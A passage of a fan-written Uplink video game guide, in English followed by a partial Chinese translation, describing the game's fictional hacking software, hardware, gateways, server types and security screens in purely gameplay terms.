Side)Neutral - Untrustworthy - Notorious - Indiscriminate - Sociopathic - Morally Bankrupt (Bad Side)2.3 – SoftwareFollowing is a guide of each piece of Software available in Uplink, and how to use it.DecrypterVersion 1 Version 2 Version 3 Version 4 Version 5 Version 6 Version 7 Cost 800c 1200c 1600c 2200c 3000c 7000c 15000c Size 2Gq 2Gq 2Gq 2Gq 3Gq 4Gq 5Gq Description Decrypt files with equal or lower encryption than the version, by clicking on them.DecypherVersion 1 Version 2 Version 3Cost 3000c 5000c 8000cSize 2Gq 2Gq 2GqDescription Decypher Elliptic Curve Encryption by clicking on the Cypher box with theprogram running. Higher versions work faster.Dictionary HackerCost: 1000cSize: 4GqAttempts to break passwords with a dictionary file. Used by clicking on the password box with the program running. Not always SuccessfulFile CopierCost: 100cSize: 1GqCopies a file, by clicking on the file, then on the memory location you wish to copy too.File DeleterCost: 100cSize: 1GqDeletes a file, by clicking on the file in the memory/file server.DefragCost: 5000cSize: 2GqSorts all the files in your memory to optimize free space, by moving files to fill in gaps.Firewall BypassVersion 1 Version 2 Version 3 Version 4 Version 5 Cost 3000c 4000c 6000c 8000c 10000cSize 1Gq 1Gq 1Gq 1Gq 1Gq Description Bypasses a Firewall with equal or lower level to the version. Open the connection Analyser, and click on the Firewall icon with the Firewall Bypass Selected. Firewall DisableVersion 1 Version 2 Version 3 Version 4 Version 5 Cost 2000c 3000c 4000c 6000c 8000cSize 1Gq 1Gq 1Gq 2Gq 3Gq Description Disables a Firewall with equal or lower level to the version. Simply click the ‘Go’ button to start the process. A Trace will begin automatically when you use this. HUD ConnectionAnalysisCost: 20000cSize: -Gives you the Connection Analysis menu, and allows you to use Bypassers.HUD IRC ClientCost: 4000cSize: -Allows you to connect to the Uplink IRC channel online, and talk with other hackers.HUD MapShowTraceCost: 5000cSize: -Allows you to see the progress of a trace on the World MapHUD LAN ViewCost: 50000cSize: -Gives you the LAN View menu, which allows you to view systems on a LAN you are currently connected to.IP LookupCost: 500cSize: 1GqAllows you to enter an IP and that IP is added to your Server Links Autom atically.IP ProbeVersion 1 Version 2 Version 3Cost 2000c 4000c 5000cSize 3Gq 3Gq 3GqDescription Allows you to enter an IP, and get information on the types of security atthat IP, via Email. Higher versions give more InformationLAN ProbeVersion 1 Version 2 Version 3Cost 15000c 20000c 30000cSize 3Gq 3Gq 4GqDescription Shows you the type, and all connections coming from, any system on aLAN. Higher versions work on higher level systems.LAN ScanVersion 1 Version 2 Version 3Cost 10000c 15000c 25000cSize 2Gq 2Gq 2GqDescription Shows you all the system present on a LAN you are connected to. Higherversions work on higher level LANs.LAN SpoofVersion 1 Version 2 Version 3Cost 20000c 30000c 45000cSize 2Gq 3Gq 5GqDescription Fools the Network into thinking you are connected to a system, allowing youaccess to systems protected by Subnets. Higher versions work on higherlevel systems.LAN ForceVersion 1 Version 2 Version 3Cost 15000c 20000c 25000cSize 2Gq 3Gq 4GqDescription Opens a lock on a LAN system. Higher versions open higher level Locks.The Systems Administrator will log on if you use this tool.Log DeleterVersion 1 Version 2 Version 3 Version 4Cost 500c 1000c 2000c 4000cSize 1Gq 1Gq 1Gq 1GqDescription Deletes a Log by clicking on it. Higher versions become harder to detect, with Version 4 being impossible to detect.Log ModifierVersion 1 Version 2Cost 4000c 6000cSize 2Gq 2GqDescription Modify a Log by clicking on it. Version 2 can create new logs fromblank spaces.Log UnDeleterCost: 5000cSize: 1GqRecover deleted logs, or restore modified logs, by clicking on them.Monitor BypassVersion 1 Version 2 Version 3 Version 4 Version 5 Cost 10000c 12000c 16000c 20000c 25000cSize 1Gq 1Gq 1Gq 1Gq 1Gq Description Bypasses a Monitor with equal or lower level to the version. Open the connection Analyser, and click on the Monitor icon with the Monitor Bypass Selected. Password BreakerCost: 1500cSize: 2GqBreak a password by clicking on the password box.Proxy BypassVersion 1 Version 2 Version 3 Version 4 Version 5 Cost 6000c 8000c 12000c 16000c 20000cSize 1Gq 1Gq 1Gq 1Gq 1Gq Description Bypasses a Proxy with equal or lower level to the version. Open the connection Analyser, and click on the Proxy icon with the Proxy Bypass Selected.Proxy DisableVersion 1 Version 2 Version 3 Version 4 Version 5 Cost 3000c 4000c 6000c 8000c 10000cSize 1Gq 1Gq 1Gq 2Gq 3Gq Description Disables a Proxy with equal or lower level to the version. Simply click the ‘Go’ button to start the process. A Trace will begin automatically when you use this. Trace TrackerVersion 1 Version 2 Version 3 Version 4Cost 300c 600c 1400c 2500cSize 1Gq 1Gq 2Gq 3Gq Description Tells you if you are being traced, and how long you have with increasingaccuracy as the Version gets higher.Voice AnalyserCost: 5000cSize: 4GqAllows you to record a voice pattern for breaking Voice Verification Security. Find the phone number of the Admin of the system, run this while he’s talking, and hit play when you need to play the voice back.Here is a run down of what each piece of hardware does, and its cost. ProcessorsCPU (20Ghz) CPU(60Ghz)CPU(80Ghz)CPU(100Ghz)CPU(120Ghz)CPU(150Ghz)CPU(200Ghz)Cost 250c 1000c 1300c 3000c 5000c 8000c 12000c Description The Faster your processor speed, the faster your gateway can do things, such as break Cyphers.MemoryMemory (8Gq) Memory (16Gq)Memory (24Gq)Memory (32Gq) Cost 3000c 5500c 8000c 11000c Description The more memory you have the more files you can store at one time. ModemsModem (1Gq/s) Modem(2Gq/s)Modem(4Gq/s)Modem(6Gq/s)Modem(8Gq/s)Modem(10Gq/s)Cost 1000c 2000c 4000c 6000c 8000c 10000c Description Supposedly makes file transfer faster, though it makes no noticeable difference. SecurityGateway Self Destruct.Cost: 20000cFits explosives to your gateway, and gives you a piece of software that can be used to detonate these explosives should the Feds get to close to your gateway.Gateway Motion SensorCost: 10000cFits motion sensing equipment to your Gateway, and gives you a piece of software that allows you to see the status of the Motion Sensor. When run, the Software, a small light appears under the Time Controls. When this light turns yellow, some one is fitting new hardware on your gateway. If it turns Red, the Feds are near your gateway, and you should use the Gateway Nuke.Note that each one of these pieces of Security is useless without the other. Without the Motion Sensor, you will not know when to use the Gateway Nuke, and without the Gateway Nuke, you won’t be able to do anything when you see the Feds coming.Also, you should never use the Gateway Nuke when the light Isn’t Red, otherwise it won’t work, and you can still be traced for anything you have done before you used the Nuke.Gateway Nuke/Motion SensorIf it worked, you should get this mailFollowing is a guide on all the Gateways available in the game.Gateway AlphaMax CPUs: 1Max Memory: 32GqMax Security: 0Max Bandwidth: 1Gq/sThe gateway you start the game with, and go back to if your gateway is ever destroyed. It’s very simple, with only one CPU slot and 32Gq Max Memory space. There is no room for security, and this model cannot handle a better modem. Due to its lack of speed, this Gateway becomes pretty useless as soon as you are required to do anything even remotely intensive, like cracking an Encryption, and it is recommended you upgrade as soon as possible.Rating: 4 out of 10Gateway Alpha ICPUMax CPUs: 2Max Memory: 32GqMax Security: 0Max Bandwidth: 1Gq/sThis Gateway is almost exactly the same as the ALPHA, except it has an extra CPU slot, which means it can have double the processor power, and for the low price, is quite a good investment at the start of the game. A lot more versatile than the ALPHA, with the extra CPU it can better handle more strenuous activities, although its lack of memory means you will still be wanting something bigger quite quickly.Rating: 5 out of 10Gateway Alpha IMEMORYMax CPUs: 1Max Memory: 64GqMax Security: 0Max Bandwidth: 1gq/sThis is the same as the ALPHA but with twice as much memory space. Unfortunately, because it still only has one processor slot, the extra memory won’t do you much good because you won’t be able to do anything else. It’s not bad it you need some extra storage space early on, because it’s quite cheap, but otherwise I would suggest against it.Rating: 4 out of 10The VIRTUANET R-Access GatewayMax CPUs: 2Max Memory: 48GqMax Security: 0Max Bandwidth: 2Gq/sThe Description says you cannot be caught with this Gateway, though a few people have reported that they have been caught with it. It has 2 CPU slots and enough space for 48Gq of m emory, though no space for security. Not to bad for the price, but personally I would save up a little more and go for the next one.Rating: 6 out of 10The KRONOS Corp 80-860 GatewayMax CPUs: 2Max Memory: 64gqMax Security: 1Max Bandwidth: 4Gq/sNamed after the Evil Corporation from the hit Anime series Guyver, this quite a good Gateway to buy as your first one. With double the CPU and Memory space of the ALPHA, space for a 4Gqs Modem and 1 security device, its good value for money, and will see you through most of the missions of difficulty 5 or 6 quite well. The downside is that one security device isn't really much help - Even if you have a motion sensor there is nothing you can do about it when it turns red.Rating: 7 out of 10The ZION-780 Series WorkstationMax CPUs: 3Max Memory: 96GqMax Security: 2Max Bandwidth: 6Gq/sAn excellent Gateway, the ZION has 3 CPU slots, enough space for 96Gq of memory, 2 security devices and a 6Gqs Modem. At Just over 10000c more than the KRONOS, this is excellent value for money. It has enough space to do most database copying missions, enough CPU space to make breaking encryptions nice and quick, and have both security devices available. I highly recommend this gateway as a stopping point before buying the Trinity.Rating: 9 out of 10The UNITY High-Security PlatformMax CPUs: 4Max Memory: 64GqMax Security: 4Max Bandwidth: 6Gq/sI personally find this Gateway pretty pointless. Its main feature is 4 security device spaces, but since there are only 2 in the game, and having more than one is pointless, this Gateway is just a big waste of time. It also has less memory space than the ZION. Its redeeming feature is that is has 4 CPU slots, but at nearly 70000c I personally think this is the biggest waste of m oney there is.Rating: 5 out of 10The AM-CORE File ServerMax CPUs: 3Max Memory: 256GqMax Security: 2Max Bandwidth: 6Gq/sThis Gateway has a huge amount of memory space, at 256gq, you will be able to do 2 database missions with this and still have space left. The 3 CPU slots is a bit of a let down, but it is sufficient for most things, though you may be left wanting more power towards the later missions. 2 Security devices make it a nice safe gateway once you have the equipment fitted, but you really have to ask your self,'Do I really need that much memory?'Rating: 8 out of 10The OMEGA Super ComputerMax CPUs: 16Max Memory: 48GqMax Security: 1Max Bandwidth: 4Gq/sThis computer is really all down to personal Preference. With 16 CPU slots, it’s by far the most powerful Gateway available, but with only 48Gq of Memory space, you won’t have nearly enough space for those 'Copy a Database' missions. A big let down is that it only has 1 security slot, but otherwise, it’s not too bad.Rating: 8 out of 10The TRINITY-1686a GatewayMax CPUs: 8Max Memory: 128GqMax Security: 3Max Bandwidth: 8Gq/sMy personal favourite, this gateway has everything you could possibly want. With 8 CPU slots, it’s easily fast enough to do anything in the game in a matter of seconds, and 128Gq of Memory space means you have plenty of room for files. The only downside of this gateway, which isn't really important, is the completely pointless 3rd Security slot. All Agents should aspire to own this Gateway. Rating: 10 out of 10These are the basic Gateways that come with the game, though there are numerous mods that will add more to the game.2.6 – Server TypesFollowing is a list of each type of server, and the kind of security you can expect to find on each server. Internal Serv ices MachineThis is the most common type of System in the game. They are easy to hack into, and a lot of the missions in the game will involve these systems. They have a File Server, a Console, a Links page, and Log access, as well as a few useless features such as Security viewing and Accounts. Security varies slightly between systems, but they always have a Password screen, and usually have a monitor, as their only main defence so a Password breaker will be sufficient to enter the system. Later on it the game, they start getting Proxy’s and Firewall’s at different levels, so a Bypass or Disabler will be required to change anything on the server. Generally, traces, both active and passive, are slow from these Systems, though a few storyline servers will trace faster.Central MainframeA lot more secure than an Internal Services Machine, though fewer in numbers, Central Mainframe sport a large amount of security, and faster traces. They also only accept connections from ‘Trusted Systems’, meaning systems owned by the same company. That means that in order to be able to connect to one, your last bounce point before the Central Mainframe has to be a server owned by the same company. They always have a Password Screen, some have a Voice Print Analyser, others have Elliptic Curve Cyphers, and some have both. They always have Monitor’s, Proxy’s and Firewall’s of varying levels, though most of them will be level 4 or 5. They have a File Server, Console and Log Access, but these don’t have any Link’s section. Most of the harder missions will involve these servers. Public Access ServersThese systems can’t be hacked, there is nothing there. All these systems are for is detailing the Admin for the relevant companies systems. This is where you go if you need the phone number of an Admin in order to break through a Voice Print Analyser.Remote Access TerminalsThese do nothing. Period.BanksSupposedly one of the most secure types of server in the game, though oddly the easiest to hack. Because using a Monitor Bypass disables all Active Traces, you have all the time you need in the system. Don’t let your self be fooled though, banks have the fastest passive traces in the game, sometimes tracing you in a matter of minutes, so once you are done, you need to work fast to clear your logs.The accounts section is protected by a Password Screen, using the account number as the user name. Firewalls and Proxy’s of varying levels protect the banks though, so these will need to be circumvented in order to make any changes to an account.The Admin section is protected by a Password, Voice Print and Elliptic Curve Cypher, and allows you access to the banks connection logs, and also the account number and password of every account at that bank.Each bank lists their Admin in an ‘About’ screen, and you have the ability to create a new account as well.File ServersA lot of companies have stand alone File Servers used for storing large amounts of data away from the main system. You will mainly uses these when you do ‘Copy a Database’ missions, as you will have to dump the files that you have copied there. They have no monitor, and although they have a password screen, these servers cannot actually be hacked. The only way to get the passwords for them is to get them via missions. If you do happen to have access to a File Server, they are very useful for backing up your programs, should something bad happen to your gateway and you have files that you cannot get again.Voice Phone SystemsBasically, dial into a person’s phone, and record their voice. You can’t hack anything here, but this is where you get the voices for the Voice Print Analyser. Connect to the phone system and run the Voice Analyser to record the voice.Personal ComputersThese serve little purpose. They are there so you know the IP address of someone you need to frame for a crime, that’s about it really. They cannot be entered because they do not accept external connections.Local Area Networks (LANs)A new type of system, added in version 1.2. They are the most secure type of system in the game, requiring a lot of time and skill to break into them. They have numerous different security features, including the standard ones found on other servers. Expensive software and HUD upgrades will be required before you can even enter these systems, and if you aren’t careful, the systems admin will log on and hunt you down on the system. These systems will appear in later missions and in the story line as well.2.7 – Security SystemsThere are multiple security systems in Uplink, and each of them needs to be tackled in a different way. Here is a list of each type of security and how to get round it.Login/Password ScreenThe most common form of security you will come across. This is easily defeated by using the Password Breaker on it. The only variation in the power of this security is the amount of time it takes to break the password, on more secure systems it will take longer.Elliptic Curve CypherA Complex, hard to crack Cypher, represented by a screen of numbers that cancel to 0 as it is cracked. To get past this you will need a Decypher. Once again, the more secure the system, the longer it takes to crack. Cracking these is very CPU intensive, so you should make sure you have a good machine before attempting to hack a server with one of these.。

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第一部分——基本操作1.1界面1.2跳跃连接1.3追踪1.4日志1.5连接1.6黑客线上服务站1.7游戏结束画面第二部分——游戏讯息2.1黑客等级2.2 没想好怎么翻2.3软件2.4硬件2.5网关2.6系统类别2.7安全系统2.8控制台指令(命令行)2.9修改你的履历2.10用户帐户第三部分——任务向导3.1局域网第四部分——剧情任务4.1 Arunmor的任务4.2 ARC的任务第五部分——特殊的服务器Section 1 – The Basics第一部分——基本操作这一章介绍游戏的基础操作,怎样开始并且在不被逮到的情况下成功实施一次黑客攻击。

1.1 –界面上端显示的是日期、当前连接到的IP地址、CPU使用率、时间控制、以及世界地图。

在CPU 使用率以下的位置显示的是当前所运行的所有软件的列表和它们各自占用的CPU使用率,此外还有按钮可以调节每个程序所占用的CPU。








1.2 –跳跃连接当你试图入侵服务器时,你需要通过其他服务器跳转你的连接。











1.3 –追踪!几乎任何一个服务器都会在你开始入侵它们安全系统的那一刻开始尝试追踪你。



要做到这点,你需要一个Trace Tracker,它能告诉你你还有多长时间才会被追踪到。





1.4 –日志只要你连接到一个服务器,你都会留下一些痕迹,这些被叫做日志。










它们的格式如下:“Connection from routed to xxx.xxx.xxx.xxx” (“跳转”的日志)“From Password authentication accepted” (密码检验通过)这些是你需要删除的日志。







)1.5 –服务器列表当你不在一个连接中的时候,你看到的最主要的画面应该是服务器列表。












1.6 –黑客精英线上服务站“Uplink Internal Services”这大概是游戏中最重要的服务器了。




1.7 –游戏结束画面“The Game Over Screen”当你扮演的黑客被捕,或者出现了使你不能工作下去的事态,如果你再进入游戏,将看到游戏结束画面。



2.1 –黑客等级(Uplink Ratings)以下是整个游戏中你将获得的等级。




)Grade 16 – Registered注册用户Grade 15 – Beginner入门黑客Grade 14 – Novice黑客新手Grade 13 – Confident 自信的黑客Grade 12 – Intermediate中级黑客Grade 11 – Skilled熟练的黑客Grade 10 – Experienced经验丰富的黑客Grade 9 – Knowledgeable博学的黑客Grade 8 – Uber-Skilled 极为熟练Grade 7 – Professional专业黑客Grade 6 – Elite精英黑客Grade 5 – Mage黑客技术魔术师Grade 4 – Expert专家Grade 3 – Veteran黑客老手Grade 2 – Techno-mage技术专家Grade 1 – TERMINAL终结者2.2 –操行等级(Neuromancer Ratings)你的操行等级(Neuromancer Rating)是一种非官方的等级,黑客同盟工会把它授予你。





举个例子,“摧毁某组织数据库”(‘Destroy a Corporate Database’)这样的任务会让你的等级上升,而“追踪一名黑客”(‘Trace a Hacker’)这样的任务将导致你的评定下降。


Neutral - Aggressive - Single Minded - Activist - Anarchic – Revolutionary (Good Side)Neutral - Untrustworthy - Notorious - Indiscriminate - Sociopathic - Morally Bankrupt(Bad Side)(注:未加翻译,用不着,即使声名狼藉也不会有何影响。


)2.3 –软件(Software)以下是软件选购使用向导。





Decypher(椭圆曲线密码编译器):通过在编译窗口上点击使用,可以破解椭圆曲线密码(Elliptic Curve Encryption),版本越高,速度越快。


)Dictionary Hacker(黑客辞典):使用自带的海量字符库来尝试破译密码,使用的是近似高速穷举的方法。


File Copier(文件拷贝器):先点击要拷贝的文件,再点击目标路径(如服务器中的file server和自己电脑上存储空间)。

File Deleter(文件删除器):点击即可删除目标文件。




Firewall Bypass(防火墙屏蔽软件):能够屏蔽同级别或低级别的防火墙。

使用方法是打开连接分析器(connection Analyser)——注意这个软件需购买,在之后会提到——然后把运行着的本软件点击在防火墙(Firewall)的图标上。
